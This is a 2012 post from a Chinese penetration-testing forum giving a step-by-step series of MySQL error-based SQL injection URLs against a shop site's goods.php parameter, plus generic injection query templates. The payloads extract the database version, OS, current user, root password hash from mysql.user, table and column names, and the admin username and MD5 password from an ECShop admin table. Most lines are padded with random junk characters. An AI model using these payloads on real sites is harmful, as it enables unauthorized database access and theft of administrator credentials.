找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 盲注详细内容
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 1982|回复: 0
打印 上一主题 下一主题

盲注详细内容

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-5 14:59:30 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
判断版本号
* I; ?6 {5 D& @9 @3 F2 E/ Q7 {- k) phttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%239 z2 r" }5 p- v- e! J- q

7 Z+ {8 o$ G' m( m; {3 M判断系统' S0 V4 U) u- Q9 w" `. G

: r! b; j; l6 v+ p& N+ U( m' ahttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
8 y  [* E% r, Q* p: U% X0 m1 E3 v3 i: ]6 ]! l( C( j

: S% M$ o. m* z. ^: j) D
) N. D2 v% |5 L# C- Q当前 user()$ C: {" F* R1 _7 `+ X$ Q/ O

$ p7 ^& P# a" m9 R) c* f; Dhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23- c& P; X+ ]# h# C+ l* P  T

: h- l& U3 x. ^+ y, E+ h
2 _9 b. Y6 a: i: c4 M2 j0 r
( {# \3 F6 P3 M% u当前 database()& B$ ]# g! U4 F4 e& {7 W3 ]
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
  y5 y4 j, ^) s% X; S' A1 T1 [- q
1 E, ^' e% H# b& _" `/ c* n

7 n% X% {# O0 T
" g! H" n+ b3 M- V  N  x  J6 droot hash; d2 j% P8 I/ V6 @- c

, ~0 m: H3 n! r  G& M0 M7 Rhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23) j  e6 o9 r' e7 C
2 a' b8 J3 J- M/ G( o

4 B  T; [7 p/ Q' w. y" M1 ?1 j9 \) B# C* @9 ^; @! Y& j
当前 数据库表名0 K/ P( q" f+ K+ B& X
0 B, z1 p; N, j* B) e! o
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
* K% k7 C' B9 m8 b' ~0 Q2 E9 y$ f: Z# }/ \) {

1 f# Z/ J, ~+ u( V5 r$ B4 Z
& U1 f3 y" f7 @! Y; \9 g: y5 M0 v3 T当前 数据库 user_name 字段2 }: B+ ]" }+ ^4 j- z, N

- O! T: c; W  c% ehttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%239 {  n; R- n2 y. _8 H+ `

) S9 e2 z0 Y3 L( X4 e3 _当前 数据库 字段 password  E& K' x* s% f$ d- J6 L+ b: X+ R
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
, f' E! O/ K* d, ^; P% H3 Y  L( i% `
" M) [  Y* y- i) Z* k- `+ V3 G8 t* w9 I3 V
9 g( `& T0 M/ h/ N9 p$ K. e$ \
获得 admin passwd(md5)
& ~) n7 @  ]$ x
6 J4 i. m5 @# E& S$ n' F- b9 p7 t+ Z
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
) x7 X/ j) [+ r% ?# U
) t! [+ z. x9 G" o0 T/ b+ p) Q报错注射
" V: I. }: a/ g$ r% Y. y) aSELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
8 j% m2 {1 ?4 y9 I: o4 t" w6 A! j% }- W5 l, ~
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)6 K9 ~3 E4 \( v

. W" |$ u- P8 T+ E& L; jand(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表